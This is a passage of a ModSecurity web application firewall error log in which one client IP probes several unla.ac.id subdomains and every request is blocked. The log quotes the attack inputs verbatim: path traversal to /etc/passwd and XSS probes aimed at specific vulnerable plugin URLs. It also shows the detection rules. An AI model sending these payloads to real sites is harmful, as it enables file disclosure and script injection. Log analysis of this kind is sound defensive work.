[maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO15p8Co-f0AAAoPuaYAAAAM"]
[Tue Aug 29 11:52:55.916717 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15p8Co-f0AAAoZ6QMAAAAK"]
[Tue Aug 29 11:52:55.927118 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:rsd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:rsd: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO15p8Co-f0AAAnHQq0AAAAT"]
[Tue Aug 29 11:52:55.934602 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:")',10000000);alert(1337);setTimeout('alert(". [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22)',10000000);alert(1337);setTimeout('alert(\\x22: \\x22)',10000000);alert(1337);setTimeout('alert(\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/www/delivery/afr.php"] [unique_id "ZO15p8Co-f0AAAofm20AAAAX"]
[Tue Aug 29 11:52:55.982866 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:rsd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:rsd: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO15p8Co-f0AAAoesJQAAAAV"]
[Tue Aug 29 11:52:56.003609 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:")',10000000);alert(1337);setTimeout('alert(". [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22)',10000000);alert(1337);setTimeout('alert(\\x22: \\x22)',10000000);alert(1337);setTimeout('alert(\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/www/delivery/afr.php"] [unique_id "ZO15qMCo-f0AAAnTlX8AAAAA"]
[Tue Aug 29 11:52:56.004055 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15qMCo-f0AAAlUlyUAAAA0"]
[Tue Aug 29 11:52:56.016505 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15qMCo-f0AAAoLfOEAAAAG"]
[Tue Aug 29 11:52:56.035683 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:")',10000000);alert(1337);setTimeout('alert(". [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22)',10000000);alert(1337);setTimeout('alert(\\x22: \\x22)',10000000);alert(1337);setTimeout('alert(\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/www/delivery/afr.php"] [unique_id "ZO15qMCo-f0AAAoPuaoAAAAM"]
[Tue Aug 29 11:52:56.037444 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:rsd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:rsd: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO15qMCo-f0AAAnd3PIAAAAI"]
[Tue Aug 29 11:52:56.042970 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:")',10000000);alert(1337);setTimeout('alert(". [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22)',10000000);alert(1337);setTimeout('alert(\\x22: \\x22)',10000000);alert(1337);setTimeout('alert(\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/www/delivery/afr.php"] [unique_id "ZO15qMCo-f0AAAnHQq4AAAAT"]
[Tue Aug 29 11:52:56.085664 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15qMCo-f0AAAmQ-4MAAAAb"]
[Tue Aug 29 11:52:57.770982 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:data[performredirect]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:data[performredirect]: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO15qcCo-f0AAAoPua4AAAAM"]
[Tue Aug 29 11:52:58.197190 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:data[performredirect]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:data[performredirect]: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO15qsCo-f0AAAoPua8AAAAM"]
[Tue Aug 29 11:52:58.452436 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:data[performredirect]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:data[performredirect]: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO15qsCo-f0AAAlUlysAAAA0"]
[Tue Aug 29 11:52:58.527104 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:data[performredirect]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:data[performredirect]: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO15qsCo-f0AAAnd3PYAAAAI"]
[Tue Aug 29 11:52:58.581177 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:data[performredirect]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:data[performredirect]: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO15qsCo-f0AAAoLfOgAAAAG"]
[Tue Aug 29 11:52:58.697556 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:data[performredirect]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:data[performredirect]: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO15qsCo-f0AAAoT7S0AAAAD"]
[Tue Aug 29 11:52:59.192373 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:file: '>\\x22<svg/onload=confirm('test')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/wordfence/lib/diffResult.php"] [unique_id "ZO15q8Co-f0AAAfWOTIAAAAL"]
[Tue Aug 29 11:52:59.202799 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:file: '>\\x22<svg/onload=confirm('test')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/wordfence/lib/diffResult.php"] [unique_id "ZO15q8Co-f0AAAoZ6RMAAAAK"]
[Tue Aug 29 11:52:59.207685 2023] [:error] [pid 2581] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:file: '>\\x22<svg/onload=confirm('test')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/wordfence/lib/diffResult.php"] [unique_id "ZO15q8Co-f0AAAoVqrsAAAAH"]
[Tue Aug 29 11:52:59.207749 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:file: '>\\x22<svg/onload=confirm('test')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/wordfence/lib/diffResult.php"] [unique_id "ZO15q8Co-f0AAAoesJwAAAAV"]
[Tue Aug 29 11:52:59.223293 2023] [:error] [pid 2589] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:file: '>\\x22<svg/onload=confirm('test')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/wordfence/lib/diffResult.php"] [unique_id "ZO15q8Co-f0AAAodkpAAAAAS"]
[Tue Aug 29 11:52:59.660720 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:file: '>\\x22<svg/onload=confirm('test')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/wordfence/lib/diffResult.php"] [unique_id "ZO15q8Co-f0AAAnd3PkAAAAI"]
[Tue Aug 29 11:53:00.563549 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22()&%< found within ARGS:language: language'\\x22()&%<yes></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/clansphere/mods/clansphere/lang_modvalidate.php"] [unique_id "ZO15rMCo-f0AAAofm3oAAAAX"]
[Tue Aug 29 11:53:00.665512 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22()&%< found within ARGS:language: language'\\x22()&%<yes></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/clansphere/mods/clansphere/lang_modvalidate.php"] [unique_id "ZO15rMCo-f0AAAfWOTgAAAAL"]
[Tue Aug 29 11:53:00.672851 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22()&%< found within ARGS:language: language'\\x22()&%<yes></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/clansphere/mods/clansphere/lang_modvalidate.php"] [unique_id "ZO15rMCo-f0AAAoLfPAAAAAG"]
[Tue Aug 29 11:53:00.691274 2023] [:error] [pid 2592] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22()&%< found within ARGS:language: language'\\x22()&%<yes></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/clansphere/mods/clansphere/lang_modvalidate.php"] [unique_id "ZO15rMCo-f0AAAog@BQAAAAY"]
[Tue Aug 29 11:53:00.693677 2023] [:error] [pid 2595] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:passformname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:passformname: \\x22><script>alert(1514407383);</script><script>/*"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plugins/vkeyboard/vkeyboard.php"] [unique_id "ZO15rMCo-f0AAAojanUAAAAb"]
[Tue Aug 29 11:53:00.695443 2023] [:error] [pid 2598] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22()&%< found within ARGS:language: language'\\x22()&%<yes></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/clansphere/mods/clansphere/lang_modvalidate.php"] [unique_id "ZO15rMCo-f0AAAoml0AAAAAf"]
[Tue Aug 29 11:53:00.712601 2023] [:error] [pid 2592] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:passformname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:passformname: \\x22><script>alert(1514407383);</script><script>/*"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/plugins/vkeyboard/vkeyboard.php"] [unique_id "ZO15rMCo-f0AAAog@BUAAAAY"]
[Tue Aug 29 11:53:00.713106 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:passformname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:passformname: \\x22><script>alert(1514407383);</script><script>/*"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/plugins/vkeyboard/vkeyboard.php"] [unique_id "ZO15rMCo-f0AAAfWOToAAAAL"]
[Tue Aug 29 11:53:00.715340 2023] [:error] [pid 2596] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:passformname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:passformname: \\x22><script>alert(1514407383);</script><script>/*"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/plugins/vkeyboard/vkeyboard.php"] [unique_id "ZO15rMCo-f0AAAoky2AAAAAd"]
